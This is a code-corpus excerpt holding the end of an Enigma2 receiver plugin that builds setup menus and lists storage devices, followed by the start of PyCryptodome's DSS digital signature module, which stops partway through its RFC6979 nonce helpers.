if self.menu <> 0:
self.menu = 0
self.selectedList = self["list"]
self["list"].selectionEnabled(1)
self["sublist"].selectionEnabled(0)
self.selectionChanged()
def goRight(self):
if self.menu == 0:
self.menu = 1
self.selectedList = self["sublist"]
self["sublist"].moveToIndex(0)
self["list"].selectionEnabled(0)
self["sublist"].selectionEnabled(1)
self.selectionSubChanged()
def goUp(self):
self.selectedList.up()
def goDown(self):
self.selectedList.down()
def keyred(self):
self.close()
def keygreen(self):
self.session.open(About)
def keyyellow(self):
self.session.open(QuickMenuDevices)
######## Main Menu ##############################
def MainQmenu(self):
self.menu = 0
self.list = []
self.oldlist = []
self.list.append(QuickMenuEntryComponent("Software Manager",_("Update/Backup/Restore your box"),_("Update/Backup your firmware, Backup/Restore settings")))
if Check_Softcam():
self.list.append(QuickMenuEntryComponent("Softcam",_("Start/stop/select cam"),_("Start/stop/select your cam, You need to install first a softcam")))
self.list.append(QuickMenuEntryComponent("System",_("System Setup"),_("Setup your System")))
self.list.append(QuickMenuEntryComponent("Mounts",_("Mount Setup"),_("Setup your mounts for network")))
self.list.append(QuickMenuEntryComponent("Network",_("Setup your local network"),_("Setup your local network. For Wlan you need to boot with a USB-Wlan stick")))
self.list.append(QuickMenuEntryComponent("AV Setup",_("Setup Videomode"),_("Setup your Video Mode, Video Output and other Video Settings")))
self.list.append(QuickMenuEntryComponent("Tuner Setup",_("Setup Tuner"),_("Setup your Tuner and search for channels")))
self.list.append(QuickMenuEntryComponent("Plugins",_("Download plugins"),_("Shows available pluigns. Here you can download and install them")))
self.list.append(QuickMenuEntryComponent("Harddisk",_("Harddisk Setup"),_("Setup your Harddisk")))
self["list"].l.setList(self.list)
######## System Setup Menu ##############################
def Qsystem(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Customise",_("Setup Enigma2"),_("Customise enigma2 personal settings")))
self.sublist.append(QuickSubMenuEntryComponent("OSD settings",_("Settings..."),_("Setup your OSD")))
self.sublist.append(QuickSubMenuEntryComponent("Button Setup",_("Button Setup"),_("Setup your remote buttons")))
if SystemInfo["FrontpanelDisplay"] and SystemInfo["Display"]:
self.sublist.append(QuickSubMenuEntryComponent("Display Settings",_("Display Setup"),_("Setup your display")))
if SystemInfo["LcdDisplay"]:
self.sublist.append(QuickSubMenuEntryComponent("LCD Skin Setup",_("Skin Setup"),_("Setup your LCD")))
self.sublist.append(QuickSubMenuEntryComponent("Channel selection",_("Channel selection configuration"),_("Setup your Channel selection configuration")))
self.sublist.append(QuickSubMenuEntryComponent("Recording settings",_("Recording Setup"),_("Setup your recording config")))
self.sublist.append(QuickSubMenuEntryComponent("EPG settings",_("EPG Setup"),_("Setup your EPG config")))
self["sublist"].l.setList(self.sublist)
######## Network Menu ##############################
def Qnetwork(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Network Wizard",_("Configure your Network"),_("Use the Networkwizard to configure your Network. The wizard will help you to setup your network")))
if len(self.adapters) > 1: # show only adapter selection if more as 1 adapter is installed
self.sublist.append(QuickSubMenuEntryComponent("Network Adapter Selection",_("Select Lan/Wlan"),_("Setup your network interface. If no Wlan stick is used, you only can select Lan")))
if not self.activeInterface == None: # show only if there is already a adapter up
self.sublist.append(QuickSubMenuEntryComponent("Network Interface",_("Setup interface"),_("Setup network. Here you can setup DHCP, IP, DNS")))
self.sublist.append(QuickSubMenuEntryComponent("Network Restart",_("Restart network to with current setup"),_("Restart network and remount connections")))
self.sublist.append(QuickSubMenuEntryComponent("Network Services",_("Setup Network Services"),_("Setup Network Services (Samba, Ftp, NFS, ...)")))
self["sublist"].l.setList(self.sublist)
#### Network Services Menu ##############################
def Qnetworkservices(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Samba",_("Setup Samba"),_("Setup Samba")))
self.sublist.append(QuickSubMenuEntryComponent("NFS",_("Setup NFS"),_("Setup NFS")))
self.sublist.append(QuickSubMenuEntryComponent("FTP",_("Setup FTP"),_("Setup FTP")))
self.sublist.append(QuickSubMenuEntryComponent("AFP",_("Setup AFP"),_("Setup AFP")))
self.sublist.append(QuickSubMenuEntryComponent("OpenVPN",_("Setup OpenVPN"),_("Setup OpenVPN")))
self.sublist.append(QuickSubMenuEntryComponent("MiniDLNA",_("Setup MiniDLNA"),_("Setup MiniDLNA")))
self.sublist.append(QuickSubMenuEntryComponent("Inadyn",_("Setup Inadyn"),_("Setup Inadyn")))
self.sublist.append(QuickSubMenuEntryComponent("SABnzbd",_("Setup SABnzbd"),_("Setup SABnzbd")))
self.sublist.append(QuickSubMenuEntryComponent("uShare",_("Setup uShare"),_("Setup uShare")))
self.sublist.append(QuickSubMenuEntryComponent("Telnet",_("Setup Telnet"),_("Setup Telnet")))
self["sublist"].l.setList(self.sublist)
######## Mount Settings Menu ##############################
def Qmount(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Mount Manager",_("Manage network mounts"),_("Setup your network mounts")))
self.sublist.append(QuickSubMenuEntryComponent("Network Browser",_("Search for network shares"),_("Search for network shares")))
self.sublist.append(QuickSubMenuEntryComponent("Device Manager",_("Mounts Devices"),_("Setup your Device mounts (USB, HDD, others...)")))
self["sublist"].l.setList(self.sublist)
######## Softcam Menu ##############################
def Qsoftcam(self):
self.sublist = []
if Check_Softcam(): # show only when there is a softcam installed
self.sublist.append(QuickSubMenuEntryComponent("Softcam Panel",_("Control your Softcams"),_("Use the Softcam Panel to control your Cam. This let you start/stop/select a cam")))
self.sublist.append(QuickSubMenuEntryComponent("Download Softcams",_("Download and install cam"),_("Shows available softcams. Here you can download and install them")))
self["sublist"].l.setList(self.sublist)
######## A/V Settings Menu ##############################
def Qavsetup(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("AV Settings",_("Setup Videomode"),_("Setup your Video Mode, Video Output and other Video Settings")))
if AUDIOSYNC == True:
self.sublist.append(QuickSubMenuEntryComponent("Audio Sync",_("Setup Audio Sync"),_("Setup Audio Sync settings")))
self.sublist.append(QuickSubMenuEntryComponent("Auto Language",_("Auto Language Selection"),_("Select your Language for Audio/Subtitles")))
if os_path.exists("/proc/stb/vmpeg/0/pep_apply") and VIDEOENH == True:
self.sublist.append(QuickSubMenuEntryComponent("VideoEnhancement",_("VideoEnhancement Setup"),_("VideoEnhancement Setup")))
self["sublist"].l.setList(self.sublist)
######## Tuner Menu ##############################
def Qtuner(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Tuner Configuration",_("Setup tuner(s)"),_("Setup each tuner for your satellite system")))
if POSSETUP == True:
self.sublist.append(QuickSubMenuEntryComponent("Positioner Setup",_("Setup rotor"),_("Setup your positioner for your satellite system")))
self.sublist.append(QuickSubMenuEntryComponent("Automatic Scan",_("Service Searching"),_("Automatic scan for services")))
self.sublist.append(QuickSubMenuEntryComponent("Manual Scan",_("Service Searching"),_("Manual scan for services")))
self.sublist.append(QuickSubMenuEntryComponent("Sat Finder",_("Search Sats"),_("Search Sats, check signal and lock")))
self["sublist"].l.setList(self.sublist)
######## Software Manager Menu ##############################
def Qsoftware(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Software Update",_("Online software update"),_("Check/Install online updates (you must have a working internet connection)")))
if not getBoxType().startswith('az') and not getBoxType().startswith('dream') and not getBoxType().startswith('ebox'):
self.sublist.append(QuickSubMenuEntryComponent("Flash Online",_("Flash Online a new image"),_("Flash on the fly your your Receiver software.")))
self.sublist.append(QuickSubMenuEntryComponent("Complete Backup",_("Backup your current image"),_("Backup your current image to HDD or USB. This will make a 1:1 copy of your box")))
self.sublist.append(QuickSubMenuEntryComponent("Backup Settings",_("Backup your current settings"),_("Backup your current settings. This includes E2-setup, channels, network and all selected files")))
self.sublist.append(QuickSubMenuEntryComponent("Restore Settings",_("Restore settings from a backup"),_("Restore your settings back from a backup. After restore the box will restart to activated the new settings")))
self.sublist.append(QuickSubMenuEntryComponent("Select Backup files",_("Choose the files to backup"),_("Here you can select which files should be added to backupfile. (default: E2-setup, channels, network")))
self.sublist.append(QuickSubMenuEntryComponent("Software Manager Setup",_("Manage your online update files"),_("Here you can select which files should be updated with a online update")))
self["sublist"].l.setList(self.sublist)
######## Plugins Menu ##############################
def Qplugin(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Plugin Browser",_("Open the Plugin Browser"),_("Shows Plugins Browser. Here you can setup installed Plugin")))
self.sublist.append(QuickSubMenuEntryComponent("Download Plugins",_("Download and install Plugins"),_("Shows available plugins. Here you can download and install them")))
self.sublist.append(QuickSubMenuEntryComponent("Remove Plugins",_("Delete Plugins"),_("Delete and unstall Plugins. This will remove the Plugin from your box")))
self.sublist.append(QuickSubMenuEntryComponent("Plugin Filter",_("Setup Plugin filter"),_("Setup Plugin filter. Here you can select which Plugins are showed in the PluginBrowser")))
self.sublist.append(QuickSubMenuEntryComponent("IPK Installer",_("Install local extension"),_("Scan for local extensions and install them")))
self["sublist"].l.setList(self.sublist)
######## Harddisk Menu ##############################
def Qharddisk(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Harddisk Setup",_("Harddisk Setup"),_("Setup your Harddisk")))
self.sublist.append(QuickSubMenuEntryComponent("Initialization",_("Format HDD"),_("Format your Harddisk")))
self.sublist.append(QuickSubMenuEntryComponent("Filesystem Check",_("Check HDD"),_("Filesystem check your Harddisk")))
if isFileSystemSupported("ext4"):
self.sublist.append(QuickSubMenuEntryComponent("Convert ext3 to ext4",_("Convert filesystem ext3 to ext4"),_("Convert filesystem ext3 to ext4")))
self["sublist"].l.setList(self.sublist)
def ok(self):
if self.menu > 0:
self.okSubList()
else:
self.goRight()
#####################################################################
######## Make Selection MAIN MENU LIST ##############################
#####################################################################
def okList(self):
item = self["list"].getCurrent()
######## Select Network Menu ##############################
if item[0] == _("Network"):
self.GetNetworkInterfaces()
self.Qnetwork()
######## Select System Setup Menu ##############################
elif item[0] == _("System"):
self.Qsystem()
######## Select Mount Menu ##############################
elif item[0] == _("Mounts"):
self.Qmount()
######## Select Softcam Menu ##############################
elif item[0] == _("Softcam"):
self.Qsoftcam()
######## Select AV Setup Menu ##############################
elif item[0] == _("AV Setup"):
self.Qavsetup()
######## Select Tuner Setup Menu ##############################
elif item[0] == _("Tuner Setup"):
self.Qtuner()
######## Select Software Manager Menu ##############################
elif item[0] == _("Software Manager"):
self.Qsoftware()
######## Select PluginDownloadBrowser Menu ##############################
elif item[0] == _("Plugins"):
self.Qplugin()
######## Select Tuner Setup Menu ##############################
elif item[0] == _("Harddisk"):
self.Qharddisk()
self["sublist"].selectionEnabled(0)
#####################################################################
######## Make Selection SUB MENU LIST ##############################
#####################################################################
def okSubList(self):
item = self["sublist"].getCurrent()
######## Select Network Menu ##############################
if item[0] == _("Network Wizard"):
self.session.open(NetworkWizard)
elif item[0] == _("Network Adapter Selection"):
self.session.open(NetworkAdapterSelection)
elif item[0] == _("Network Interface"):
self.session.open(AdapterSetup,self.activeInterface)
elif item[0] == _("Network Restart"):
self.session.open(RestartNetwork)
elif item[0] == _("Network Services"):
self.Qnetworkservices()
self["sublist"].moveToIndex(0)
elif item[0] == _("Samba"):
self.session.open(NetworkSamba)
elif item[0] == _("NFS"):
self.session.open(NetworkNfs)
elif item[0] == _("FTP"):
self.session.open(NetworkFtp)
elif item[0] == _("AFP"):
self.session.open(NetworkAfp)
elif item[0] == _("OpenVPN"):
self.session.open(NetworkOpenvpn)
elif item[0] == _("MiniDLNA"):
self.session.open(NetworkMiniDLNA)
elif item[0] == _("Inadyn"):
self.session.open(NetworkInadyn)
elif item[0] == _("SABnzbd"):
self.session.open(NetworkSABnzbd)
elif item[0] == _("uShare"):
self.session.open(NetworkuShare)
elif item[0] == _("Telnet"):
self.session.open(NetworkTelnet)
######## Select System Setup Menu ##############################
elif item[0] == _("Customise"):
self.openSetup("usage")
elif item[0] == _("Button Setup"):
self.openSetup("remotesetup")
elif item[0] == _("Display Settings"):
self.openSetup("display")
elif item[0] == _("LCD Skin Setup"):
self.session.open(LcdSkinSelector)
elif item[0] == _("OSD settings"):
self.openSetup("userinterface")
elif item[0] == _("Channel selection"):
self.openSetup("channelselection")
elif item[0] == _("Recording settings"):
self.openSetup("recording")
elif item[0] == _("EPG settings"):
self.openSetup("epgsettings")
######## Select Mounts Menu ##############################
elif item[0] == _("Mount Manager"):
self.session.open(AutoMountManager, None, plugin_path_networkbrowser)
elif item[0] == _("Network Browser"):
self.session.open(NetworkBrowser, None, plugin_path_networkbrowser)
elif item[0] == _("Device Manager"):
self.session.open(HddMount)
######## Select Softcam Menu ##############################
elif item[0] == _("Softcam Panel"):
self.session.open(SoftcamPanel)
elif item[0] == _("Download Softcams"):
self.session.open(ShowSoftcamPackages)
######## Select AV Setup Menu ##############################
elif item[0] == _("AV Settings"):
self.session.open(VideoSetup)
elif item[0] == _("Auto Language"):
self.openSetup("autolanguagesetup")
elif item[0] == _("Audio Sync"):
self.session.open(AC3LipSyncSetup, plugin_path_audiosync)
elif item[0] == _("VideoEnhancement"):
self.session.open(VideoEnhancementSetup)
######## Select TUNER Setup Menu ##############################
elif item[0] == _("Tuner Configuration"):
self.session.open(NimSelection)
elif item[0] == _("Positioner Setup"):
self.PositionerMain()
elif item[0] == _("Automatic Scan"):
self.session.open(ScanSimple)
elif item[0] == _("Manual Scan"):
self.session.open(ScanSetup)
elif item[0] == _("Sat Finder"):
self.SatfinderMain()
######## Select Software Manager Menu ##############################
elif item[0] == _("Software Update"):
self.session.open(SoftwarePanel)
elif item[0] == _("Flash Online"):
self.session.open(FlashOnline)
elif item[0] == _("Complete Backup"):
if DFLASH == True:
self.session.open(dFlash)
else:
self.session.open(ImageBackup)
elif item[0] == _("Backup Settings"):
self.session.openWithCallback(self.backupDone,BackupScreen, runBackup = True)
elif item[0] == _("Restore Settings"):
self.backuppath = getBackupPath()
if not path.isdir(self.backuppath):
self.backuppath = getOldBackupPath()
self.backupfile = getBackupFilename()
self.fullbackupfilename = self.backuppath + "/" + self.backupfile
if os_path.exists(self.fullbackupfilename):
self.session.openWithCallback(self.startRestore, MessageBox, _("Are you sure you want to restore your %s %s backup?\nSTB will restart after the restore") % (getMachineBrand(), getMachineName()))
else:
self.session.open(MessageBox, _("Sorry no backups found!"), MessageBox.TYPE_INFO, timeout = 10)
elif item[0] == _("Select Backup files"):
self.session.openWithCallback(self.backupfiles_choosen,BackupSelection)
elif item[0] == _("Software Manager Setup"):
self.session.open(SoftwareManagerSetup)
######## Select PluginDownloadBrowser Menu ##############################
elif item[0] == _("Plugin Browser"):
self.session.open(PluginBrowser)
elif item[0] == _("Download Plugins"):
self.session.open(PluginDownloadBrowser, 0)
elif item[0] == _("Remove Plugins"):
self.session.open(PluginDownloadBrowser, 1)
elif item[0] == _("Plugin Filter"):
self.session.open(PluginFilter)
elif item[0] == _("IPK Installer"):
try:
from Plugins.Extensions.MediaScanner.plugin import main
main(self.session)
except:
self.session.open(MessageBox, _("Sorry MediaScanner is not installed!"), MessageBox.TYPE_INFO, timeout = 10)
######## Select Harddisk Menu ############################################
elif item[0] == _("Harddisk Setup"):
self.openSetup("harddisk")
elif item[0] == _("Initialization"):
self.session.open(HarddiskSelection)
elif item[0] == _("Filesystem Check"):
self.session.open(HarddiskFsckSelection)
elif item[0] == _("Convert ext3 to ext4"):
self.session.open(HarddiskConvertExt4Selection)
######## OPEN SETUP MENUS ####################
def openSetup(self, dialog):
self.session.openWithCallback(self.menuClosed, Setup, dialog)
def menuClosed(self, *res):
pass
######## NETWORK TOOLS #######################
def GetNetworkInterfaces(self):
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getAdapterList()]
if not self.adapters:
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getConfiguredAdapters()]
if len(self.adapters) == 0:
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getInstalledAdapters()]
self.activeInterface = None
for x in self.adapters:
if iNetwork.getAdapterAttribute(x[1], 'up') is True:
self.activeInterface = x[1]
return
######## TUNER TOOLS #######################
def PositionerMain(self):
nimList = nimmanager.getNimListOfType("DVB-S")
if len(nimList) == 0:
self.session.open(MessageBox, _("No positioner capable frontend found."), MessageBox.TYPE_ERROR)
else:
if len(NavigationInstance.instance.getRecordings()) > 0:
self.session.open(MessageBox, _("A recording is currently running. Please stop the recording before trying to configure the positioner."), MessageBox.TYPE_ERROR)
else:
usableNims = []
for x in nimList:
configured_rotor_sats = nimmanager.getRotorSatListForNim(x)
if len(configured_rotor_sats) != 0:
usableNims.append(x)
if len(usableNims) == 1:
self.session.open(PositionerSetup, usableNims[0])
elif len(usableNims) > 1:
self.session.open(RotorNimSelection)
else:
self.session.open(MessageBox, _("No tuner is configured for use with a diseqc positioner!"), MessageBox.TYPE_ERROR)
def SatfinderMain(self):
nims = nimmanager.getNimListOfType("DVB-S")
nimList = []
for x in nims:
if not nimmanager.getNimConfig(x).configMode.getValue() in ("loopthrough", "satposdepends", "nothing"):
nimList.append(x)
if len(nimList) == 0:
self.session.open(MessageBox, _("No satellite frontend found!!"), MessageBox.TYPE_ERROR)
else:
if len(NavigationInstance.instance.getRecordings()) > 0:
self.session.open(MessageBox, _("A recording is currently running. Please stop the recording before trying to start the satfinder."), MessageBox.TYPE_ERROR)
else:
self.session.open(Satfinder)
######## SOFTWARE MANAGER TOOLS #######################
def backupfiles_choosen(self, ret):
config.plugins.configurationbackup.backupdirs.save()
config.plugins.configurationbackup.save()
config.save()
def backupDone(self,retval = None):
if retval is True:
self.session.open(MessageBox, _("Backup done."), MessageBox.TYPE_INFO, timeout = 10)
else:
self.session.open(MessageBox, _("Backup failed."), MessageBox.TYPE_INFO, timeout = 10)
def startRestore(self, ret = False):
if (ret == True):
self.exe = True
self.session.open(RestoreScreen, runRestore = True)
######## Create MENULIST format #######################
def QuickMenuEntryComponent(name, description, long_description = None, width=540):
pngname = name.replace(" ","_")
png = LoadPixmap("/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/" + pngname + ".png")
if png is None:
png = LoadPixmap("/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/default.png")
return [
_(name),
MultiContentEntryText(pos=(120, 5), size=(width-120, 25), font=0, text = _(name)),
MultiContentEntryText(pos=(120, 26), size=(width-120, 17), font=1, text = _(description)),
MultiContentEntryPixmapAlphaTest(pos=(10, 5), size=(100, 40), png = png),
_(long_description),
]
def QuickSubMenuEntryComponent(name, description, long_description = None, width=540):
return [
_(name),
MultiContentEntryText(pos=(10, 5), size=(width-10, 25), font=0, text = _(name)),
MultiContentEntryText(pos=(10, 26), size=(width-10, 17), font=1, text = _(description)),
_(long_description),
]
class QuickMenuList(MenuList):
def __init__(self, list, enableWrapAround=True):
MenuList.__init__(self, list, enableWrapAround, eListboxPythonMultiContent)
self.l.setFont(0, gFont("Regular", 20))
self.l.setFont(1, gFont("Regular", 14))
self.l.setItemHeight(50)
class QuickMenuSubList(MenuList):
def __init__(self, sublist, enableWrapAround=True):
MenuList.__init__(self, sublist, enableWrapAround, eListboxPythonMultiContent)
self.l.setFont(0, gFont("Regular", 20))
self.l.setFont(1, gFont("Regular", 14))
self.l.setItemHeight(50)
class QuickMenuDevices(Screen):
skin = """
<screen name="QuickMenuDevices" position="center,center" size="840,525" title="Devices" flags="wfBorder">
<widget source="devicelist" render="Listbox" position="30,46" size="780,450" font="Regular;16" scrollbarMode="showOnDemand" transparent="1" backgroundColorSelected="grey" foregroundColorSelected="black">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (90, 0), size = (600, 30), font=0, text = 0),
MultiContentEntryText(pos = (110, 30), size = (600, 50), font=1, flags = RT_VALIGN_TOP, text = 1),
MultiContentEntryPixmapAlphaBlend(pos = (0, 0), size = (80, 80), png = 2),
],
"fonts": [gFont("Regular", 24),gFont("Regular", 20)],
"itemHeight": 85
}
</convert>
</widget>
<widget name="lab1" zPosition="2" position="126,92" size="600,40" font="Regular;22" halign="center" backgroundColor="black" transparent="1" />
</screen> """
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Devices"))
self['lab1'] = Label()
self.devicelist = []
self['devicelist'] = List(self.devicelist)
self['actions'] = ActionMap(['WizardActions'],
{
'back': self.close,
})
self.activityTimer = eTimer()
self.activityTimer.timeout.get().append(self.updateList2)
self.updateList()
def updateList(self, result = None, retval = None, extra_args = None):
scanning = _("Wait please while scanning for devices...")
self['lab1'].setText(scanning)
self.activityTimer.start(10)
def updateList2(self):
self.activityTimer.stop()
self.devicelist = []
list2 = []
f = open('/proc/partitions', 'r')
for line in f.readlines():
parts = line.strip().split()
if not parts:
continue
device = parts[3]
if not search('sd[a-z][1-9]',device):
continue
if device in list2:
continue
self.buildMy_rec(device)
list2.append(device)
f.close()
self['devicelist'].list = self.devicelist
if len(self.devicelist) == 0:
self['lab1'].setText(_("No Devices Found !!"))
else:
self['lab1'].hide()
def buildMy_rec(self, device):
try:
if device.find('1') > 0:
device2 = device.replace('1', '')
except:
device2 = ''
try:
if device.find('2') > 0:
device2 = device.replace('2', '')
except:
device2 = ''
try:
if device.find('3') > 0:
device2 = device.replace('3', '')
except:
device2 = ''
try:
if device.find('4') > 0:
device2 = device.replace('4', '')
except:
device2 = ''
devicetype = path.realpath('/sys/block/' + device2 + '/device')
d2 = device
name = 'USB: '
mypixmap = '/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/dev_usbstick.png'
model = file('/sys/block/' + device2 + '/device/model').read()
model = str(model).replace('\n', '')
des = ''
if devicetype.find('/devices/pci') != -1:
name = _("HARD DISK: ")
mypixmap = '/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/dev_hdd.png'
name = name + model
from Components.Console import Console
self.Console = Console()
self.Console.ePopen("sfdisk -l /dev/sd? | grep swap | awk '{print $(NF-9)}' >/tmp/devices.tmp")
sleep(0.5)
f = open('/tmp/devices.tmp', 'r')
swapdevices = f.read()
f.close()
swapdevices = swapdevices.replace('\n','')
swapdevices = swapdevices.split('/')
f = open('/proc/mounts', 'r')
for line in f.readlines():
if line.find(device) != -1:
parts = line.strip().split()
d1 = parts[1]
dtype = parts[2]
rw = parts[3]
break
continue
else:
if device in swapdevices:
parts = line.strip().split()
d1 = _("None")
dtype = 'swap'
rw = _("None")
break
continue
else:
d1 = _("None")
dtype = _("unavailable")
rw = _("None")
f.close()
f = open('/proc/partitions', 'r')
for line in f.readlines():
if line.find(device) != -1:
parts = line.strip().split()
size = int(parts[2])
if ((size / 1024) / 1024) > 1:
des = _("Size: ") + str((size / 1024) / 1024) + _("GB")
else:
des = _("Size: ") + str(size / 1024) + _("MB")
else:
try:
size = file('/sys/block/' + device2 + '/' + device + '/size').read()
size = str(size).replace('\n', '')
size = int(size)
except:
size = 0
if (((size / 2) / 1024) / 1024) > 1:
des = _("Size: ") + str(((size / 2) / 1024) / 1024) + _("GB")
else:
des = _("Size: ") + str((size / 2) / 1024) + _("MB")
f.close()
if des != '':
if rw.startswith('rw'):
rw = ' R/W'
elif rw.startswith('ro'):
rw = ' R/O'
else:
rw = ""
des += '\t' + _("Mount: ") + d1 + '\n' + _("Device: ") + ' /dev/' + device + '\t' + _("Type: ") + dtype + rw
png = LoadPixmap(mypixmap)
res = (name, des, png)
self.devicelist.append(res)
| XTAv2/Enigma2 | lib/python/Plugins/Extensions/ExtrasPanel/QuickMenu.py | Python | gpl-2.0 | 35,097 |
#
# Signature/DSS.py : DSS.py
#
# ===================================================================
#
# Copyright (c) 2014, Legrandin <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
"""
Digital Signature Standard (DSS), as specified in `FIPS PUB 186-3`__.
A sender signs a message in the following way:
>>> from Cryptodome.Hash import SHA256
>>> from Cryptodome.PublicKey import ECC
>>> from Cryptodome.Signature import DSS
>>>
>>> message = b'I give my permission to order #4355'
>>> key = ECC.import_key(open('privkey.der').read())
>>> h = SHA256.new(message)
>>> signer = DSS.new(key, 'fips-186-3')
>>> signature = signer.sign(h)
The receiver can verify authenticity of the message:
>>> key = ECC.import_key(open('pubkey.der').read())
>>> h = SHA256.new(received_message)
>>> verifier = DSS.new(key, 'fips-186-3')
>>> try:
>>> verifier.verify(h, signature):
>>> print "The message is authentic."
>>> except ValueError:
>>> print "The message is not authentic."
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
"""
__all__ = ['new', 'DssSigScheme']
from Cryptodome.Util.py3compat import bchr, b
from Cryptodome.Util.asn1 import DerSequence
from Cryptodome.Util.number import long_to_bytes
from Cryptodome.Math.Numbers import Integer
from Cryptodome.Hash import HMAC
from Cryptodome.PublicKey.ECC import _curve, EccKey
class DssSigScheme(object):
"""This signature scheme can perform DSS signature or verification.
:undocumented: __init__
"""
def __init__(self, key, encoding, order):
"""Create a new Digital Signature Standard (DSS) object.
Do not instantiate this object directly,
use `Cryptodome.Signature.DSS.new` instead.
"""
self._key = key
self._encoding = encoding
self._order = order
self._order_bits = self._order.size_in_bits()
self._order_bytes = (self._order_bits - 1) // 8 + 1
def can_sign(self):
"""Return True if this signature object can be used
for signing messages."""
return self._key.has_private()
def _compute_nonce(self, msg_hash):
raise NotImplementedError("To be provided by subclasses")
def _valid_hash(self, msg_hash):
raise NotImplementedError("To be provided by subclasses")
def sign(self, msg_hash):
"""Produce the DSS signature of a message.
:Parameters:
msg_hash : hash object
The hash that was carried out over the message.
The object belongs to the `Cryptodome.Hash` package.
Under mode *'fips-186-3'*, the hash must be a FIPS
approved secure hash (SHA-1 or a member of the SHA-2 family),
of cryptographic strength appropriate for the DSA key.
For instance, a 3072/256 DSA key can only be used
in combination with SHA-512.
:Return: The signature encoded as a byte string.
:Raise ValueError:
If the hash algorithm is incompatible to the DSA key.
:Raise TypeError:
If the DSA key has no private half.
"""
if not self._valid_hash(msg_hash):
raise ValueError("Hash is not sufficiently strong")
# Generate the nonce k (critical!)
nonce = self._compute_nonce(msg_hash)
# Perform signature using the raw API
z = Integer.from_bytes(msg_hash.digest()[:self._order_bytes])
sig_pair = self._key._sign(z, nonce)
# Encode the signature into a single byte string
if self._encoding == 'binary':
output = b("").join([long_to_bytes(x, self._order_bytes)
for x in sig_pair])
else:
# Dss-sig ::= SEQUENCE {
# r OCTET STRING,
# s OCTET STRING
# }
output = DerSequence(sig_pair).encode()
return output
def verify(self, msg_hash, signature):
"""Verify that a certain DSS signature is authentic.
This function checks if the party holding the private half of the key
really signed the message.
:Parameters:
msg_hash : hash object
The hash that was carried out over the message.
This is an object belonging to the `Cryptodome.Hash` module.
Under mode *'fips-186-3'*, the hash must be a FIPS
approved secure hash (SHA-1 or a member of the SHA-2 family),
of cryptographic strength appropriate for the DSA key.
For instance, a 3072/256 DSA key can only be used in
combination with SHA-512.
signature : byte string
The signature that needs to be validated.
:Raise ValueError:
If the signature is not authentic.
"""
if not self._valid_hash(msg_hash):
raise ValueError("Hash does not belong to SHS")
if self._encoding == 'binary':
if len(signature) != (2 * self._order_bytes):
raise ValueError("The signature is not authentic (length)")
r_prime, s_prime = [Integer.from_bytes(x)
for x in (signature[:self._order_bytes],
signature[self._order_bytes:])]
else:
try:
der_seq = DerSequence().decode(signature)
except (ValueError, IndexError):
raise ValueError("The signature is not authentic (DER)")
if len(der_seq) != 2 or not der_seq.hasOnlyInts():
raise ValueError("The signature is not authentic (DER content)")
r_prime, s_prime = der_seq[0], der_seq[1]
if not (0 < r_prime < self._order) or not (0 < s_prime < self._order):
raise ValueError("The signature is not authentic (d)")
z = Integer.from_bytes(msg_hash.digest()[:self._order_bytes])
result = self._key._verify(z, (r_prime, s_prime))
if not result:
raise ValueError("The signature is not authentic")
# Make PyCryptodome code to fail
return False
class DeterministicDsaSigScheme(DssSigScheme):
# Also applicable to ECDSA
def __init__(self, key, encoding, order, private_key):
super(DeterministicDsaSigScheme, self).__init__(key, encoding, order)
self._private_key = private_key
def _bits2int(self, bstr):
"""See 2.3.2 in RFC6979"""
result = Integer.from_bytes(bstr)
q_len = self._order.size_in_bits()
b_len = len(bstr) * 8
if b_len > q_len:
result >>= (b_len - q_len)
return result
def _int2octets(self, int_mod_q):
"""See 2.3.3 in RFC6979"""
assert 0 < int_mod_q < self._order
return long_to_bytes(int_mod_q, self._order_bytes)
def _bits2octets(self, bstr):
"""See 2.3.4 in RFC6979"""
z1 = self._bits2int(bstr)
if z1 < self._order:
z2 = z1
